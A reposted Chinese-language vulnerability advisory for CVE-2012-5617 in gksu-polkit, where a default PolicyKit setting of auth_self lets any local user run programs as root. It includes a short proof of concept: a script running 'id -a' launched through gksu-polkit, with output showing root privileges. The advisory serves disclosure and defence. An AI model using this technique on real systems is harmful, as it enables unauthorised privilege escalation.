polkit policykit配置文件身份验证设置权限提升漏洞

日期：2020-06-07 栏目：程序人生浏览：次

发布日期：2012-12-12
更新日期：2012-12-14

受影响系统：
GNOME gksu-polkit
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 56918
CVE(CAN) ID: CVE-2012-5617

gksu-polkit是一个库和命令行工具，可以以root权限运行程序。

gksu-polkit所带的PolicyKit配置文件允许用户以管理员权限执行程序，因为默认的allow_active设置是"auth_self"，而不是"auth_admin"，任何本地用户可利用此漏洞以root权限执行任意程序。

<*来源：Miroslav Trmac

链接：https://launchpad.net/Ubuntu/+source/gksu-polkit
https://bugzilla.RedHat.com/show_bug.cgi?id=883162
https://bugzilla.redhat.com/show_bug.cgi?id=886671
?bug=695807

*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

$ cat foo.sh
#! /bin/bash
id -a
# not just gksu-polkit id -a because gksu-polkit tries to interpret the -a
# this prompts for user's password only
$ gksu-polkit /home/user/foo.sh
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0

建议：
--------------------------------------------------------------------------------
厂商补丁：

GNOME
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

https://live.gnome.org/gksu

转载注明出处：https://www.heiqu.com/wydwyw.html

polkit policykit配置文件身份验证设置权限提升漏洞

相关推荐